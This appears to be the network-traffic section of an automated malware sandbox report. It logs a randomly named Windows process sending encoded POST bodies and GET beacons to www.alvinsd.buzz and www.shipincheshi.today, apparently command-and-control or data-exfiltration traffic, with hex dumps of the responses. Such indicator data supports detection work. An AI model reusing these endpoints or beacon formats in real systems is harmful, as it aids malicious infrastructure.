                                                                                                            Data Ascii: LRW=nMadcZ1xpl/rppYyNhWAYXwLZQfvpRG/MnlTsi9SqLp5wO0TP75i6rK2zJUXbq9Q2jtGN13h8x12IeSRA6Em7UyG1hSjF6TWCafyTHaPcfSSztAPcrrp1AYqr4LcCAXaOwpZoVrbsXw0GLBA6kihCM63GWODCwui9xqclHrQ4pNaRnEfATuQZmSma6mk+DQ1fw==
                                                                                                             Nov 27, 2024 16:43:51.962773085 CET | 1206 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty/1.25.3.2
                                                                                                            Date: Wed, 27 Nov 2024 15:43:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: session_id=cf1b2716bf19a9da6498878cf92c0402; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 27-Nov-2024 15:43:51 GMT
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 33 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 6d 8f e2 36 10 fe 2b 29 a8 d2 21 6d 48 e0 80 5d 85 04 35 8b b6 ed e9 d4 de 1e 5b b6 6a bf 9c 1c 7b 48 dc 73 6c cb 36 6f 87 f8 ef 1d 27 c0 72 a8 1f 9a 28 89 f3 cc fb 33 63 a7 3f 30 45 dd 5e 43 e5 6a 31 4b fd 3b 10 44 96 19 c8 70 f9 32 4b 6b 70 24 a0 15 31 16 5c b6 fc e3 e7 f0 e1 8c 29 e9 40 ba ac b3 e5 cc 55 19 83 0d a7 10 36 3f 77 5c 72 c7 89 08 2d 25 02 b2 41 47 92 1a b2 0d 87 ad 56 c6 cd 52 c7 9d 80 59 1a 9d be 82 cb af 41 65 60 95 75 18 71 24 e1 35 29 21 d2 b2 9c 16 c4 c2 64 74 c7 5f 1f 3f 2d b6 f1 c7 5f 4a 95 e3 f5 fb cb b2 7a 5a 96 7e f9 e4 5f 8f f3 fc 33 7e e6 83 5f f3 ed dc 03 f3 58 3c 7d 7e 5d 8c 86 f5 f3 43 b4 a5 79 5e fe f6 98 eb 3f bf fd 1d e5 cd f5 b2 7c fd b4 f8 38 9e ff f5 e1 43 d6 31 20 32 8e c5 04 9e 84 ec 12 fb 3a ad ca 39 6d 93 28 da 6e b7 fd 52 a9 52 40 9f aa 3a f0 96 da 00 da 4a a0 2e a0 46 59 ab 0c 2f b9 bc 36 8e 88 d6 02 42 a7 d6 b4 0a 7d a0 3e 7a 6f 6c 6f 05 81 e5 df c0 66 83 87 78 87 cf 2c b5 6e 8f f4 24 46 29 77 08 c3 9a 70 [TRUNCATED]
                                                                                                            Data Ascii: 358Tm6+)!mH]5[j{Hsl6o'r(3c?0E^Cj1K;Dp2Kkp$1\)@U6?w\r-%AGVRYAe`uq$5)!dt_?-_JzZ~_3~_X<}~]Cy^?|8C1 2:9m(nRR@:J.FY/6B}>zolofx,n$F)wpeHP&OO;KV>3r?'}uaAJoWW+RsO:v,6`;jD~owcAxc\*a`pBqLu-)Z$JFeo%FYs$k7{j^V.ymjMLMThwAw\8Yk"On.5f]Qqnyw<V@aSu2a|7L}xN:T$H![c{\b9.dO=v-CBVFnH1]`/i$Mg))U42VP_mpV>"xmz6`.\`6Xn0JDYNiDab wl|0


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             6 | 192.168.2.4 | 49810 | 139.162.181.76 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:53.325275898 CET | 745 | OUT | POST /d43q/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.alvinsd.buzz
                                                                                                            Origin: http://www.alvinsd.buzz
                                                                                                            Referer: http://www.alvinsd.buzz/d43q/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 220
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6e 4d 61 64 63 5a 31 78 70 6c 2f 72 6f 4b 51 79 49 43 75 41 64 33 77 49 63 51 66 76 6a 78 48 32 4d 6e 70 54 73 67 52 43 71 5a 4e 35 77 75 6b 54 4f 36 35 69 35 72 4b 32 37 70 55 59 59 61 39 50 32 6a 78 6b 4e 33 6a 68 38 78 68 32 49 65 69 52 42 4e 51 6c 36 45 79 45 75 78 53 68 4c 61 54 57 43 61 66 79 54 48 6e 6b 63 62 47 53 30 63 77 50 64 4f 4c 6d 71 77 59 70 39 6f 4c 63 47 41 57 52 4f 77 70 37 6f 58 66 69 73 52 30 30 47 50 46 41 36 78 4f 2b 52 73 36 31 62 6d 50 79 44 54 71 6d 79 54 44 33 72 55 54 67 32 59 31 57 55 68 4a 46 52 69 50 48 4c 6d 32 56 48 39 76 51 7a 41 74 38 45 7a 39 50 54 30 6e 58 4a 79 53 46 38 30 62 79 4a 62 33 77 69 52 51 3d
                                                                                                            Data Ascii: LRW=nMadcZ1xpl/roKQyICuAd3wIcQfvjxH2MnpTsgRCqZN5wukTO65i5rK27pUYYa9P2jxkN3jh8xh2IeiRBNQl6EyEuxShLaTWCafyTHnkcbGS0cwPdOLmqwYp9oLcGAWROwp7oXfisR00GPFA6xO+Rs61bmPyDTqmyTD3rUTg2Y1WUhJFRiPHLm2VH9vQzAt8Ez9PT0nXJySF80byJb3wiRQ=
                                                                                                             Nov 27, 2024 16:43:54.656110048 CET | 1206 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty/1.25.3.2
                                                                                                            Date: Wed, 27 Nov 2024 15:43:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: session_id=613e767aca6f319ba064a395c9cba916; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 27-Nov-2024 15:43:54 GMT
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 33 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 6d 8f e2 36 10 fe 2b 29 a8 d2 21 6d 48 e0 80 5d 85 04 35 8b b6 ed e9 d4 de 1e 5b b6 6a bf 9c 1c 7b 48 dc 73 6c cb 36 6f 87 f8 ef 1d 27 c0 72 a8 1f 9a 28 89 f3 cc fb 33 63 a7 3f 30 45 dd 5e 43 e5 6a 31 4b fd 3b 10 44 96 19 c8 70 f9 32 4b 6b 70 24 a0 15 31 16 5c b6 fc e3 e7 f0 e1 8c 29 e9 40 ba ac b3 e5 cc 55 19 83 0d a7 10 36 3f 77 5c 72 c7 89 08 2d 25 02 b2 41 47 92 1a b2 0d 87 ad 56 c6 cd 52 c7 9d 80 59 1a 9d be 82 cb af 41 65 60 95 75 18 71 24 e1 35 29 21 d2 b2 9c 16 c4 c2 64 74 c7 5f 1f 3f 2d b6 f1 c7 5f 4a 95 e3 f5 fb cb b2 7a 5a 96 7e f9 e4 5f 8f f3 fc 33 7e e6 83 5f f3 ed dc 03 f3 58 3c 7d 7e 5d 8c 86 f5 f3 43 b4 a5 79 5e fe f6 98 eb 3f bf fd 1d e5 cd f5 b2 7c fd b4 f8 38 9e ff f5 e1 43 d6 31 20 32 8e c5 04 9e 84 ec 12 fb 3a ad ca 39 6d 93 28 da 6e b7 fd 52 a9 52 40 9f aa 3a f0 96 da 00 da 4a a0 2e a0 46 59 ab 0c 2f b9 bc 36 8e 88 d6 02 42 a7 d6 b4 0a 7d a0 3e 7a 6f 6c 6f 05 81 e5 df c0 66 83 87 78 87 cf 2c b5 6e 8f f4 24 46 29 77 08 c3 9a 70 [TRUNCATED]
                                                                                                            Data Ascii: 358Tm6+)!mH]5[j{Hsl6o'r(3c?0E^Cj1K;Dp2Kkp$1\)@U6?w\r-%AGVRYAe`uq$5)!dt_?-_JzZ~_3~_X<}~]Cy^?|8C1 2:9m(nRR@:J.FY/6B}>zolofx,n$F)wpeHP&OO;KV>3r?'}uaAJoWW+RsO:v,6`;jD~owcAxc\*a`pBqLu-)Z$JFeo%FYs$k7{j^V.ymjMLMThwAw\8Yk"On.5f]Qqnyw<V@aSu2a|7L}xN:T$H![c{\b9.dO=v-CBVFnH1]`/i$Mg))U42VP_mpV>"xmz6`.\`6Xn0JDYNiDab wl|0


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             7 | 192.168.2.4 | 49817 | 139.162.181.76 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:56.270591021 CET | 10827 | OUT | POST /d43q/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.alvinsd.buzz
                                                                                                            Origin: http://www.alvinsd.buzz
                                                                                                            Referer: http://www.alvinsd.buzz/d43q/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 10300
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6e 4d 61 64 63 5a 31 78 70 6c 2f 72 6f 4b 51 79 49 43 75 41 64 33 77 49 63 51 66 76 6a 78 48 32 4d 6e 70 54 73 67 52 43 71 5a 46 35 78 64 63 54 50 5a 68 69 34 72 4b 32 31 4a 56 2f 59 61 39 47 32 6a 70 67 4e 33 2f 78 38 7a 5a 32 4a 39 61 52 56 70 38 6c 7a 45 79 45 78 68 53 69 46 36 54 50 43 61 76 32 54 47 4c 6b 63 62 47 53 30 65 6f 50 61 62 72 6d 78 77 59 71 72 34 4c 59 43 41 58 32 4f 77 68 42 6f 58 4c 74 77 78 55 30 47 76 56 41 33 6e 36 2b 53 4d 36 7a 59 6d 50 71 44 55 6a 34 79 54 66 52 72 56 6e 5a 32 59 52 57 56 6c 45 42 4f 42 48 61 66 52 4f 74 53 36 32 77 32 52 42 4a 48 77 68 44 59 6b 48 44 65 42 75 56 38 56 53 59 52 6f 37 37 31 30 74 76 75 55 74 72 5a 6c 39 64 63 6a 69 65 6a 55 70 62 48 6f 76 31 74 68 59 52 45 36 54 45 6b 4e 6c 69 49 72 53 4c 52 48 44 69 78 45 34 34 78 64 39 4c 6e 72 6a 6b 54 64 41 42 56 4c 53 51 79 64 4d 71 37 39 6b 64 2b 39 71 59 67 38 6d 72 6d 58 6c 66 7a 49 62 75 38 64 6f 33 35 4c 2b 53 58 77 42 2b 2b 61 37 74 43 6e 6b 6b 46 36 6e 73 7a 54 50 62 53 4f 4f 79 73 6e [TRUNCATED]
                                                                                                             Data Ascii: LRW=... [TRUNCATED]
                                                                                                             Nov 27, 2024 16:43:57.571856976 CET | 1206 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty/1.25.3.2
                                                                                                            Date: Wed, 27 Nov 2024 15:43:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: session_id=924fbce9156422ea095e50e4df280999; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 27-Nov-2024 15:43:57 GMT
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 33 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 6d 8f e2 36 10 fe 2b 29 a8 d2 21 6d 48 e0 80 5d 85 04 35 8b b6 ed e9 d4 de 1e 5b b6 6a bf 9c 1c 7b 48 dc 73 6c cb 36 6f 87 f8 ef 1d 27 c0 72 a8 1f 9a 28 89 f3 cc fb 33 63 a7 3f 30 45 dd 5e 43 e5 6a 31 4b fd 3b 10 44 96 19 c8 70 f9 32 4b 6b 70 24 a0 15 31 16 5c b6 fc e3 e7 f0 e1 8c 29 e9 40 ba ac b3 e5 cc 55 19 83 0d a7 10 36 3f 77 5c 72 c7 89 08 2d 25 02 b2 41 47 92 1a b2 0d 87 ad 56 c6 cd 52 c7 9d 80 59 1a 9d be 82 cb af 41 65 60 95 75 18 71 24 e1 35 29 21 d2 b2 9c 16 c4 c2 64 74 c7 5f 1f 3f 2d b6 f1 c7 5f 4a 95 e3 f5 fb cb b2 7a 5a 96 7e f9 e4 5f 8f f3 fc 33 7e e6 83 5f f3 ed dc 03 f3 58 3c 7d 7e 5d 8c 86 f5 f3 43 b4 a5 79 5e fe f6 98 eb 3f bf fd 1d e5 cd f5 b2 7c fd b4 f8 38 9e ff f5 e1 43 d6 31 20 32 8e c5 04 9e 84 ec 12 fb 3a ad ca 39 6d 93 28 da 6e b7 fd 52 a9 52 40 9f aa 3a f0 96 da 00 da 4a a0 2e a0 46 59 ab 0c 2f b9 bc 36 8e 88 d6 02 42 a7 d6 b4 0a 7d a0 3e 7a 6f 6c 6f 05 81 e5 df c0 66 83 87 78 87 cf 2c b5 6e 8f f4 24 46 29 77 08 c3 9a 70 [TRUNCATED]
                                                                                                            Data Ascii: 358Tm6+)!mH]5[j{Hsl6o'r(3c?0E^Cj1K;Dp2Kkp$1\)@U6?w\r-%AGVRYAe`uq$5)!dt_?-_JzZ~_3~_X<}~]Cy^?|8C1 2:9m(nRR@:J.FY/6B}>zolofx,n$F)wpeHP&OO;KV>3r?'}uaAJoWW+RsO:v,6`;jD~owcAxc\*a`pBqLu-)Z$JFeo%FYs$k7{j^V.ymjMLMThwAw\8Yk"On.5f]Qqnyw<V@aSu2a|7L}xN:T$H![c{\b9.dO=v-CBVFnH1]`/i$Mg))U42VP_mpV>"xmz6`.\`6Xn0JDYNiDab wl|0


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             8 | 192.168.2.4 | 49826 | 139.162.181.76 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:58.960870981 CET | 461 | OUT | GET /d43q/?fvqp6=9vfXK&LRW=qOy9fp5Cl0yUgYAEczO7dyJ+bxzOsQOuCHBFuR5y1LF4o9syCZkEzLGi7aZXV+ZbwDd0E0+zyiVRHPLTItQK1mi6x0nkeaPePZztRgCxUMm7wu9eAI3Dzhs= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.alvinsd.buzz
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                             Nov 27, 2024 16:44:00.224970102 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty/1.25.3.2
                                                                                                            Date: Wed, 27 Nov 2024 15:44:00 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 1538
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: session_id=ce022d5d1cc0a13b443043945bd1b483; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 27-Nov-2024 15:44:00 GMT
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 51 41 41 41 43 31 48 41 77 43 41 41 41 41 43 30 6c 45 51 56 52 34 32 6d 50 38 2f 77 63 41 41 67 4d 42 41 70 57 7a 5a 2f 41 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 3d 22 72 65 6c 3d 69 63 6f 6e 20 74 79 70 65 3d 69 6d 61 67 65 2f 70 6e 67 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 63 72 6f 73 73 6f 72 69 [TRUNCATED]
                                                                                                            Data Ascii: <!doctypehtml><html lang=en-US><meta charset=UTF-8><meta content="width=device-width,initial-scale=1"name=viewport><title></title><link href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/wcAAgMBApWzZ/AAAAAASUVORK5CYII="rel=icon type=image/png><link href=https://www.google.com rel=preconnect crossorigin><link href=/apple-touch-icon.png rel=apple-touch-icon sizes=180x180><style>:root{--main-bg-color:#2b2b2b;--main-text-color:#fff;--link-color:#76ABAE;--contact-bar-bg:#646464;--contact-bar-text:#eee;--font-family:"Arial",sans-serif;--base-font-size:16px}html{font-size:var(--base-font-size)}body,html{margin:0;padding:0;border:0;display:flex;flex-direction:column;font-family:var(--font-family);background:var(--main-bg-color);color:var(--main-text-color);text-align:center}a{color:var(--link-color)}h1{font-weight:300;font-style:normal;margin:45px 0;text-transform:uppercase}#container{
Nov 27, 2024 16:44:00.225033045 CET | 610 | IN | Data Raw: 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 68 65 61 64 65 72 7b 6d 61 72 67 69
                                                                                                            Data Ascii: display:flex;flex-direction:column;min-height:100vh;visibility:hidden}header{margin-bottom:24px}main{flex:1;width:100%;margin:auto}@media screen and (min-width:768px){main{width:650px}}footer{font-size:.75rem;padding-top:1.5625rem}#searchbox{p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49841 | 154.23.176.197 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:44:06.346745014 CET | 743 | OUT | POST /b20s/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shipincheshi.today
                                                                                                            Origin: http://www.shipincheshi.today
                                                                                                            Referer: http://www.shipincheshi.today/b20s/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 67 58 70 2f 68 49 6c 4c 66 78 74 50 37 67 79 6b 72 31 76 35 68 33 73 38 38 78 53 74 6b 71 58 69 38 6a 32 76 68 6f 4d 62 4d 51 51 4a 70 61 70 39 49 44 6f 75 33 6f 36 77 33 43 71 64 6f 70 55 37 64 49 71 59 77 78 79 59 4a 51 76 46 39 65 57 4d 44 63 41 66 5a 32 4f 4e 65 2f 36 68 68 79 48 5a 47 73 7a 76 4e 54 43 62 6a 66 59 78 59 58 78 76 74 64 56 4e 74 4c 4e 6c 6d 52 52 64 56 56 56 69 74 71 52 2b 6e 79 79 65 42 6f 53 4d 56 74 46 49 68 35 52 4c 4b 6f 4e 32 54 6e 6c 6c 66 35 45 77 4e 51 7a 59 48 49 30 50 41 69 30 36 4d 73 63 6a 5a 77 34 66 43 62 35 5a 6a 46 4e 6a 55 37 44 38 2b 41 3d 3d
                                                                                                            Data Ascii: LRW=gXp/hIlLfxtP7gykr1v5h3s88xStkqXi8j2vhoMbMQQJpap9IDou3o6w3CqdopU7dIqYwxyYJQvF9eWMDcAfZ2ONe/6hhyHZGszvNTCbjfYxYXxvtdVNtLNlmRRdVVVitqR+nyyeBoSMVtFIh5RLKoN2Tnllf5EwNQzYHI0PAi06MscjZw4fCb5ZjFNjU7D8+A==
Nov 27, 2024 16:44:07.968125105 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Wed, 27 Nov 2024 15:58:24 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 4794
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 71 77 db 54 96 ff 7b f9 14 6f 4d c1 4e b1 2d db 49 1c 37 71 c2 1a c7 49 3c 24 76 6a 3b 2d 85 76 7d 64 e9 d9 56 23 4b aa f4 1c c7 2d 3d 07 76 67 a0 b3 db 52 3a b0 4c bb 0b cb 14 ce 01 0e ec b4 b3 33 bb c0 00 65 bf 4c 9d a6 7f ed 57 d8 fb 64 d9 96 a5 27 c7 b8 e0 c0 2a 27 89 f4 74 df 7d bf 7b df bd f7 dd fb 2c 39 f9 b7 ab f9 74 e9 dc 76 06 d5 49 43 5e 79 2a d9 fb 87 79 71 e5 29 04 47 b2 81 09 8f 84 3a af 1b 98 2c fb 76 4a 6b a1 84 cf ba 45 24 22 e3 95 47 7f f9 f6 d1 b7 1f 76 6e de 7a f4 ee 87 8f df bd 73 78 ff 7e 92 eb de b1 31 50 f8 06 5e f6 e9 6a 45 25 86 0f 09 aa 42 b0 02 ec 14 55 52 44 bc 1f 54 d4 aa 2a cb 6a cb 87 38 ab 97 41 da 3d 0e f4 e0 4e a2 17 78 03 a3 93 5c bf a9 a2 8a 6d 74 a5 7f 49 0f 41 95 55 7d 11 3d 3d 3b 3b bb 34 74 a3 0a 03 2e a2 68 5c db 47 67 b0 2e f2 0a 1f 44 be 0d 2c ef 61 22 09 3c ca e1 26 f6 05 51 bd d7 10 44 29 5d e2 e5 20 f2 6f 49 82 ae 1a 6a 95 a0 73 fc 06 96 fc 41 64 f0 8a 11 32 b0 2e 55 87 87 68 f0 7a 4d 52 16 51 64 b8 59 e3 45 51 52 6a [TRUNCATED]
                                                                                                            Data Ascii: \qwT{oMN-I7qI<$vj;-v}dV#K-=vgR:L3eLWd'*'t}{,9tvIC^y*yq)G:,vJkE$"Gvnzsx~1P^jE%BURDT*j8A=Nx\mtIAU}==;;4t.h\Gg.D,a"<&QD)] oIjsAd2.UhzMRQdYEQRjbP\WS2xv-, |U[wgchbln9\_~[e#DDXQ@UD4)zcLYG"k,Rk6}<TDPf`O`"N4pFu&R}"lu5]*Bu"c$DSh*m"D3#+_5a+XV4yY^DiUtRwmn+.a=lh(-zxwif"*U!j9@O""s&z'd\%A)EVI_{?<:Thp"@`D4^j`"<Gvfv8[PtLm8g]#B)O^)uab# U>=Fedh2F))TdUuL863wOTv+m:hz.68:B9*KWXfe8*,yh<LnL&ku(=?J
Nov 27, 2024 16:44:07.968146086 CET | 224 | IN | Data Raw: 63 a9 87 e8 b0 58 3e a9 cf 33 e4 36 57 b5 a3 97 93 a1 21 7e 26 da f0 8c 06 51 8f 22 83 c5 c1 65 fb 7d ad 02 93 e1 80 cd 64 24 4a 7b 8b 20 21 09 09 75 49 16 99 6e d4 5d b4 c7 5b 59 2d da 11 8b ab 6d 21 1c 4a 67 ce f0 50 41 42 aa 6a b0 73 9a d0 1e
                                                                                                            Data Ascii: cX>36W!~&Q"e}d$J{ !uIn][Y-m!JgPABjsws1RY2yHs8$Ui;B-+:wCzN0Rq-RZ%=P"pY^u+E c%tRw=5gh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49847 | 154.23.176.197 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:44:09.022443056 CET | 763 | OUT | POST /b20s/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shipincheshi.today
                                                                                                            Origin: http://www.shipincheshi.today
                                                                                                            Referer: http://www.shipincheshi.today/b20s/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 220
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 67 58 70 2f 68 49 6c 4c 66 78 74 50 30 6b 4f 6b 6f 53 7a 35 6e 58 73 2f 79 52 53 74 75 4b 58 75 38 6a 36 76 68 70 4a 45 50 69 45 4a 70 36 35 39 53 43 6f 75 32 6f 36 77 38 69 71 63 31 35 55 4f 64 49 6d 6d 77 7a 6d 59 4a 51 4c 46 39 66 6d 4d 41 76 6f 63 5a 6d 4f 4c 57 66 36 6a 6c 79 48 5a 47 73 7a 76 4e 54 47 78 6a 63 6f 78 59 45 35 76 73 2f 74 43 6b 72 4e 6b 32 42 52 64 45 6c 56 6d 74 71 52 4d 6e 7a 76 7a 42 71 71 4d 56 75 52 49 69 74 46 49 51 34 4e 38 65 48 6b 74 50 35 4e 48 55 68 65 72 42 75 6f 31 4f 43 4d 6c 4e 71 52 35 49 42 5a 49 51 62 64 71 2b 43 45 58 5a 34 2b 31 6c 4c 64 45 6e 64 53 77 34 64 6c 52 62 55 64 4a 6d 50 4b 69 30 4b 55 3d
                                                                                                            Data Ascii: LRW=gXp/hIlLfxtP0kOkoSz5nXs/yRStuKXu8j6vhpJEPiEJp659SCou2o6w8iqc15UOdImmwzmYJQLF9fmMAvocZmOLWf6jlyHZGszvNTGxjcoxYE5vs/tCkrNk2BRdElVmtqRMnzvzBqqMVuRIitFIQ4N8eHktP5NHUherBuo1OCMlNqR5IBZIQbdq+CEXZ4+1lLdEndSw4dlRbUdJmPKi0KU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49853 | 154.23.176.197 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:44:11.692883968 CET | 10845 | OUT | POST /b20s/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shipincheshi.today
                                                                                                            Origin: http://www.shipincheshi.today
                                                                                                            Referer: http://www.shipincheshi.today/b20s/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 10300
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
